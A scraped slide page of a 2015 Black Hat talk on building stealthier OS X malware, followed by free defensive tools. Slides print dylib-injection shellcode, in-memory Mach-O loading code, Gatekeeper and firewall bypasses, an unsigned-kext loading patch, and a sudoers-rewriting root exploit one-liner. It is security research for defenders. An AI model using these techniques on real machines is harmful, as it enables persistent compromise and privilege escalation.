QCon London: Mastering long-running processes in modern architectures
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 

Black Hat '15: Writing Bad @$$ Malware for OS X

  • 2. “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle    
  • 3. this talk will cover… OUTLINE overview of os x malware bad @$$ malware defenses }bypassing pspspersistenceinfection self-defense features talk does not cover firmware or kernel-mode OS X malware (see: "Thunderstrike 2: Sith Strike")
  • 4. OVERVIEW OF OS X MALWARE the status quo
  • 5. macs are everywhere (home & enterprise) THE RISE OF MACS macs as % of total usa pc sales #3 usa / #5 worldwide vendor in pc shipments percentage 0 3.5 7 10.5 14 year '09 '10 '11 '12 '13 doesn’t  include  iDevices "Mac notebook sales have grown 21% over the last year, while total industry sales have fallen" -apple (3/2015)
  • 6. but macs don’t get malware…right? MALWARE ON OS X? ‘first’ virus (elk cloner) infected apple II’s last 5 years; ~50 new 
 os x malware families “It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) "[2014] nearly 1000 unique attacks on Macs; 25 major families" -kasperksy
  • 7. __cstring:0000E910
 db  'clipboardd',0
 db  'com.apple.service.clipboardd.plist',0   db  '/Library/LaunchAgents',0     db  '<plist  version="1.0">',0Ah        '<key>RunAtLoad</key>',0Ah   provides reverse shell, keylogging, & screen capture OSX/XSLCMD “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com launch agent reverse shell keylogging screen capture OS X 10.9+ crashes
  • 8. ‘standard’ backdoor, providing survey, download/execute, etc. OSX/IWORM #  fs_usage  -­‐w  -­‐f  filesys   20:28:28.727871    open      /Library/LaunchDaemons/com.JavaW.plist                                               20:28:28.727890    write        B=0x16b                                                                                                         launch daemon survey download execute persisting infected torrents launch daemon plist
  • 9. an iOS infector (via USB) OSX/WIRELURKER } contacts texts launch daemons survey} infected app(s)
 'Maiyadi App Store' infects connected iPhones “a collection of scripts, plists, & binaries all duct-taped together... making it easy to detect.” -j zdziarski
  • 10. hackingteam's implant; collect all things! OSX/CRISIS (RCSMAC) launch agent rootkit component “There is nothing to be impressed from them from a technical point of view.” -@osxreverser persistence intelligence collection features
  • 11. the current state of OS X malware THE (KNOWN) STATUS QUO persistence psp bypassself-defense features ‣ well known techniques ‣ majority: launch items ‣ minimal obfuscation ‣ no active self-defense ‣ inelegantly implemented ‣ suffice for the job ‣ no psp awareness ‣ no counter-measures “current OS X malware, while sufficient, is inelegant, amateur, and trivial to detect & prevent”grade: C+ stealth ‣ 'hide' in plain site ‣ stand-alone executables infection ‣ trojans ‣ phishing/old exploits
  • 12. BAD @$$ OS X MALWARE current malware++
  • 13. current methods are rather lame INITIAL INFECTION VECTOR(S) fake codecs fake installers/updates infected torrents/apps }protects dumb users Gatekeeper blocking untrusted code somewhat effective, but smart users should be ok.
  • 14. a far better infection channel INFECTING SOFTWARE DOWNLOADS my dock MitM & infect non-SSL'd internet downloads HTTP :( still need to bypass GateKeeper... ;)
  • 15. these should be secure, right!? INFECTING AV SOFTWARE DOWNLOADS all the security software I could find, was downloaded over HTTP! LittleSnitch Sophos } ClamXav
  • 16. current methods are very lame PERSISTANCE launch items } login items persistence methods ‣ well known ‣ easily visible wirelurker's 4(!) launch daemons $  python  knockknock.py   com.apple.MailServiceAgentHelper   path:  /usr/bin/com.apple.MailServiceAgentHelper   com.apple.appstore.PluginHelper   path:  /usr/bin/com.apple.appstore.PluginHelper   periodicdate   path:  /usr/bin/periodicdate
 
 systemkeychain-­‐helper   path:  /usr/bin/systemkeychain-­‐helper MacProtector's login item
  • 17. fairly stealthy & difficult to disinfect BINARY INFECTION? Process:                  Safari  [1599]   Path:                        Safari.app/Contents/MacOS/Safari   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 OS loader verifies all signatures :( killed by the loader
  • 18. the crypto seems solid, but what if it was gone? BINARY INFECTION? code signature :) #  md5  Safari.app/Contents/MacOS/Safari  -­‐>                633d043cf9742d6f0787acdee742c10d
 #  unsign.py  Safari.app/Contents/MacOS/Safari
    Safari  code  signature  removed
 
 #  md5  Safari.app/Contents/MacOS/Safari  -­‐>              825edd6a1e3aefa98d7cf99a60bac409
 
 $  open  /Applications/Safari.app  &&  ps  aux  |  grep  Safari      patrick    31337    /Applications/Safari.app  
  • 19. self-contained somewhat difficult to detect (now), lots of options! PERSISTENCE VIA BINARY INFECTION add new LC_LOAD_DYLIB? hijack entry point? } difficult to disinfect! google 'OS.X/Boubou'
  • 20. simply plant a dylib to win! DYLIB HIJACKING <blah>.dylib <blah>.dylib "I need <blah>.dylib" app dir "DLL Hijacking on OS X? #@%& Yeah!" DefCon (Sat, Aug 8th)
  • 21. via Apple's PhotoStreamAgent ('iCloudPhotos.app') DYLIB HIJACKING PERSISTENCE configure hijacker against PhotoFoundation (dylib) copy to /Applications/iPhoto.app/Contents/ Library/LoginItems/PhotoFoundation.framework/ Versions/A/PhotoFoundation $  reboot     $  lsof  -­‐p  <pid  of  PhotoStreamAgent>   /Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation   /Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation PhotoStreamAgent novel no new processes no binary/OS modifications } abuses legitimate functionality of OS X OS X El Capitan still 'hijackable'
  • 22. currently, essentially non-existent SELF-DEFENSE 'hide' in plain sight } some crypto self-defense methods trivial to find trivial to analyze trivial to disinfect too easy for the AV companies!
  • 23. abusing OS X's natively supported encryption ENCRYPTED MACH-O BINARIES //load  &  decrypt  segments   load_segment(...){      //decrypt  encrypted  segments      if(scp-­‐>flags  &  SG_PROTECTED_VERSION_1)    unprotect_dsmos_segment(scp-­‐>fileoff,  scp-­‐>filesize,  vp,                                                  pager_offset,  map,  map_addr,  map_size);     }
 //decrypt  chunk   unprotect_dsmos_segment(...){
    //function  pointer  to  decryption  routine      crypt_info.page_decrypt  =  dsmos_page_transform;
    //decrypt
    vm_map_apple_protected(map,  map_addr,  map_addr  +  map_size,  
                                                &crypt_info);
 } ourhardworkbythesewordsguar dedpleasedontsteal(c)AppleC algo: Blowfish (pre 10.6, AES) $  strings  -­‐a  myMalware     applicationDidFinishLaunching:   @"NSString"16@0:8   I  <3  BLACKHAT!   $  ./protect  myMalware    encrypting  'myMalware'   type:  CPU_TYPE_X86_64    encryption  complete   $  strings  -­‐a  myMalware  
 n^jd[P5{Q   r_`EYFaJq07 known malware: ~50% detection drop
  • 24. tie to a specific target STRONGLY ENCRYPT YOUR MALWARE "environmental key generation towards clueless agents" "[the malware] tied the infection to the specific machine, and meant the payload couldn't be decrypted without knowing the NTFS object ID" 'equation group malware' N: environmental observation
 H: a one way (hash) function M: hash(es) H of observation N, needed for activation, carried by agent
 K: a key //at runtime if H(H(N)) = M then let K := H(N) } intended target any other
  • 25. IN-MEMORY DECRYPTION & LOADING C&C server } custom in-memory loader? map image load dependencies link OS X supports in-memory loading! local file-system memory custom crypto, requires custom loader
  • 26. dyld supports in-memory loading/linking IN-MEMORY MACH-O LOADING //vars   NSObjectFileImage  fileImage  =  NULL;   NSModule  module                          =  NULL;   NSSymbol  symbol                          =  NULL;   void  (*function)(const  char  *message);     //have  an  in-­‐memory  (file)  image  of  a  mach-­‐O  file  to  load/link   //  -­‐>note:  memory  must  be  page-­‐aligned  and  alloc'd  via  vm_alloc!
 //create  object  file  image
 NSCreateObjectFileImageFromMemory(codeAddr,  codeSize,  &fileImage);
 //link  module  
 module  =  NSLinkModule(fileImage,  "<anything>",  NSLINKMODULE_OPTION_PRIVATE);   //lookup  exported  symbol  (function)   symbol  =  NSLookupSymbolInModule(module,  "_"  "HelloBlackHat");
 //get  exported  function's  address
 function  =  NSAddressOfSymbol(symbol);
 //invoke  exported  function
 function("thanks  for  being  so  offensive  ;)"); loading a mach-O file from memory sample code released by apple (2005) 'MemoryBasedBundle' stealth++ no longer hosted
  • 27. unlink dylibs to complicated detection 'HIDING' LOADED LIBRARIES struct  task_dyld_info  {     mach_vm_address_t   all_image_info_addr;       mach_vm_size_t        all_image_info_size;       integer_t                all_image_info_format;         };   struct  dyld_all_image_infos  {     uint32_t             version;         uint32_t             infoArrayCount;       const  struct  dyld_image_info*  infoArray;      ... remove from infoArray decrement infoArrayCount $  unlinkDylib   [+]  injected  into  1337,  unlinked  dylib:  /Users/patrick/hideMe.dylib     
 #  lldb  -­‐p  1337   (lldb)  image  list  |  hideMe.dylib   error:  the  target  has  no  matching  modules loaded dylib data structures to unlink unlinked dylib; hidden from lldb et. al. stealth++
  • 28. other random ideas SELF DEFENSE prevent deletion? 'complicating' deletion #  chflags  schg  malware.dylib
 #  rm  malware.dylib   rm:  malware.dylib:  Operation  not  permitted "The schg flag can only be unset in single-user mode" self-monitoring? detect local access (dtrace) #  /usr/bin/opensnoop   0    90189  AVSCANNER      malware.dylib virusTotal 0 10 20 30 40 jan feb mar apr may detect detections google adwords? }
  • 29. getting code into remote processes RUN-TIME PROCESS INJECTION newosxbook.com }mac hacker's handbook run-time injection mach_inject (PPC & i386) x86_64 no x86_64 :( buggy/broken :( (intentionally) at run-time, inject arbitrary dynamic libraries (dylibs) into arbitrary process the goal
  • 30. determining target process' architecture RUN-TIME PROCESS INJECTION //check  if  remote  process  is  x86_64   BOOL  Is64Bit(pid_t  targetPID)   {          //info  struct          struct  proc_bsdshortinfo  procInfo;                    //get  proc  info          //  -­‐>assumes  valid  pid,  etc          proc_pidinfo(targetPID,  PROC_PIDT_SHORTBSDINFO,                                    0,  &procInfo,  PROC_PIDT_SHORTBSDINFO_SIZE);                    //'pbsi_flags'  has  a  64-­‐bit  mask          return  procInfo.pbsi_flags  &  PROC_FLAG_LP64;   } external process, architecture detection all 64-bit 32 3rd-party 32-bit google drive dropbox vpn apps 64 } }
  • 31. //remote  library  loading  shellcode  (x86_64)     char  shellCode[]  =    "x90"                                                                                //  nop..    "x55"                                                                                //  pushq    %rbp    "x48x89xe5"                                                                //  movq      %rsp,  %rbp    "x48x83xecx20"                                                        //  subq      $32,  %rsp    "x89x7dxfc"                                                                //  movl      %edi,  -­‐4(%rbp)    "x48x89x75xf0"                                                        //  movq      %rsi,  -­‐16(%rbp)    "xb0x00"                                                                        //  movb      $0,  %al    
  //  call  pthread_set_self      "x48xbfx00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rdi    "x48xb8"  "_PTHRDSS"                                                  //  movabsq  $140735540045793,  %rax    "xffxd0"                                                                        //  callq    *%rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "x48x8dx3dx2cx00x00x00"                                //  leaq      44(%rip),  %rdi    
  //  dlopen    "x48xb8"  "DLOPEN__"                                                  //  movabsq  $140735516395848,  %rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "xffxd0"                                                                        //  callq    *%rax        //  sleep(1000000)...    "x48xbfx00xe4x0bx54x02x00x00x00"        //  movabsq  $10000000000,  %rdi    "x48xb8"  "SLEEP___"                                                  //  movabsq  $140735516630165,  %rax    "xffxd0"                                                                        //  callq    *%rax    //  plenty  of  space  for  a  full  path  name  here    "LIBLIBLIBLIB"  "x00x00x00x00x00x00...."; target's process architecture RUN-TIME PROCESS INJECTION www.newosxbook.com 64 }addrs patched in at runtime
  • 32. getting code into remote processes RUN-TIME PROCESS INJECTION task_for_pid() mach_vm_allocate() thread_create_running()mach_vm_write() vm_protect() task_for_pid() requires r00t
  • 33. dylib injection (again) ftw! LOAD-TIME PROCESS INJECTION gain automatic & persistent code execution within a process only via a dynamic library hijack }no binary / OS file modifications no process monitoring no complex runtime injection no detection of injection <010>
  • 34. into Apple's Xcode LOAD-TIME PROCESS INJECTION $  python  dylibHijackScanner.py     
 Xcode  is  vulnerable  (multiple  rpaths)   'binary':                '/Applications/Xcode.app/Contents/MacOS/Xcode'   'importedDylib':  '/DVTFoundation.framework/Versions/A/DVTFoundation'     'LC_RPATH':            '/Applications/Xcode.app/Contents/Frameworks' configure hijacker against DVTFoundation (dylib) copy to /Applications/Xcode.app/Contents/ Frameworks/DVTFoundation.framework/Versions/A/ do you trust your compiler now!? 
 (k thompson) Xcode
  • 35. ...starting with Apple's BYPASSING SECURITY PRODUCTS/TECHNOLOGIES xprotectgatekeeper os x sandbox code-signing ‘wins’ < so we’re all safe now, right?!? nope! }
  • 36. allowing unsigned code to execute BYPASSING GATEKEEPER circumvent gatekeeper's draconic blockage via a dynamic library hijack the goal bypass this? gatekeeper in action
  • 37. all files with quarantine attribute are checked HOW GATEKEEPER WORKS quarantine attributes //attributes   $  xattr  -­‐l  ~/Downloads/malware.dmg        com.apple.quarantine:0001;534e3038;      Safari;  B8E3DA59-­‐32F6-­‐4580-­‐8AB3...   safari, etc. tags downloaded content "Gatekeeper is an anti-malware feature of the OS X operating system. It allows users to restrict which sources they can install applications from, in order to reduce the likelihood of executing a Trojan horse" -apple.com
  • 38. go home gatekeeper, you are drunk! GATEKEEPER BYPASS find an -signed or 'mac app store' app that contains an external relative reference to a hijackable dylib create a .dmg with the necessary folder structure to contain the malicious dylib in the externally referenced location #winning verified, so can't modify .dmg/.zip layout (signed) application <external>.dylib gatekeeper only verifies the app bundle!! not verified!
  • 39. #winning GATEKEEPER BYPASS gatekeeper setting's (maximum) gatekeeper bypass :) unsigned (non-Mac App Store) code execution!! CVE 2015-3715 patched in OS X 10.10.4 standard alert still can bypass ;)
  • 40. avoiding detection BYPASSING XPROTECT circumvent XProtect's malware detection so that malware can run in an uninhibited manner the goal bypass this? XProtect in action (flagging iWorm)
  • 41. apple's built-in AV product is weak sauce BYPASSING XPROTECT XProtect signature file (iWorm) name hash file name } bypasses recompile write new ...or just rename!
  • 42. decently secure, but lots of OS X bugs! ESCAPING THE OS X SANDBOX escape from the OS X sandbox to so that our malicious code can perform malicious actions. the goal user data system resources app sandboxed app 20+ bugs that could bypass the sandbox (‘project zero’) "Unauthorized Cross-App Resource Access on Mac OS X & iOS" [ bypasses ]
  • 43. allowing unsigned kext to load BYPASSING KERNEL-MODE CODE SIGNING load malicious unsigned kexts into the kernel the goal bypass this? OS X kernel-mode signing checks
  • 44. directly interface with the kernel BYPASSING KERNEL-MODE CODE SIGNING //unload  kext  daemon   #  launchctl  unload  /System/Library/LaunchDaemons/com.apple.kextd.plist   //load  (unsigned)  driver  with  custom  kext_load   #  ./patchedKextload  -­‐v  unsigned.kext
    Can't  contact  kextd;  attempting  to  load  directly  into  kernel   //profit  :)   #  kextstat  |  grep  -­‐i  unsigned      138        0  0xffffff7f82eeb000    com.synack.unsigned unsigned kext loading download kext_tools patch & recompile kextload loadKextsIntoKernel(KextloadArgs  *  toolArgs)
 {
    //sigResult  =  checkKextSignature(theKext,  0x1,  earlyBoot);      //always  OK!      sigResult  =  0;   } patched kextload
  • 45. rootpipe reborn & more! NEED ROOT? copy Directory Utility to /tmp to get write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility evil plugin payload WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel      Directory  Utility.app "Stick That In Your (root)Pipe & Smoke It" 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s or, another bug (Stefan Esser) unpatched!
  • 46. ...and the rest (equally lame) BYPASSING SECURITY PRODUCTS LittleSnitch Sophos ClamXav } bypasses recompile write new behavioral based (firewall)
  • 47. abusing trust to access the network BYPASSING LITTLESNITCH generically bypass LittleSnitch to allow malicious code to access the network in an uninhibited manner? the goal bypass this? LittleSnitch in action
  • 48. load-time 'injection' into a trusted process LITTLE SNITCH BYPASS 0X1 $  python  dylibHijackScanner.py     
 GPG  Keychain  is  vulnerable  (weak/rpath'd  dylib)   'binary':                '/Applications/GPG  Keychain.app/Contents/MacOS/GPG  Keychain'   'weak  dylib':        '/Libmacgpg.framework/Versions/B/Libmacgpg'     'LC_RPATH':            '/Applications/GPG  Keychain.app/Contents/Frameworks' GPG Keychain LittleSnitch rule for GPG Keychain got 99 problems but LittleSnitch ain't one ;)
  • 49. more generically, via iCloud LITTLE SNITCH BYPASS 0X2 iCloud un-deletable system rule: "anybody can talk to iCloud" LittleSnitch's iCloud rule o rly!?...yes!
  • 50. putting some pieces all together SIMPLE END-TO-END ATTACK persist exfil file download & execute cmd persistently install a malicious dylib as a hijacker upload a file ('topSecret') to a remote iCloud account download and run a command ('Calculator.app') doesn't require r00t!
  • 51. ClamXav LittleSnitch Sophos the AV industry vs me ;) PSP TESTING are these blocked? persist exfil file download & execute cmd OS X 'security' products
  • 52. DEFENSE free os x security tools
  • 53. MY CONUNDRUM …I love my mac, but it's so easy to hack "No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." -unnamed AV company ha, BULLSHIT! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
  • 54. free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
  • 55. KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
  • 56. KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
  • 57. BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
  • 58. TASKEXPLORER explore all running tasks (processes) '#' filters signing virus total dylibs files network
  • 59. EL CAPITAN (OS X 10.11) next version of OS X to keep us all safe? System  Integrity  Protection
 "A  new  security  policy  that  applies  to  every  running  process,  including   privileged  code  and  code  that  runs  out  of  the  sandbox.  The  policy  extends   additional  protections  to  components  on  disk  and  at  run-­‐time,  only   allowing  system  binaries  to  be  modified  by  the  system  installer  and   software  updates.  Code  injection  and  runtime  attachments  to  system   binaries  are  no  longer  permitted."  -­‐apple.com "rootless" iWorm vs. OS X 10.11 (beta 5)"wut!?" the test:
  • 60.
  • 61. CONCLUSIONS some key takeaways... bypassing pspspersistenceinfection self-defense features improve the malwarez current OS X malware is lame; leading to complacent security products! think differently
  • 62. QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) "Objective-See's OS X Security Tools" Blackhat Arsenal (tomorrow, 15:30 - 18:00) syn.ac/BlackhatMalware
  • 63. credits - thezooom.com - deviantart.net - iconmonstr.com - flaticon.com images - @osxreverser - http://reverse.put.as/Hitcon_2012_Presentation.pdf - https://www.syscan.org/index.php/download/get/9ee8ed70ddcb2d53169b2420f2fa286e/ SyScan15%20Pedro%20Vilaca%20-%20BadXNU%20a%20rotten%20apple - https://reverse.put.as/2013/11/23/breaking-os-x-signed-kernel-extensions-with-a-nop/
 - www.newosxbook.com - mac hacker's handbook talks/books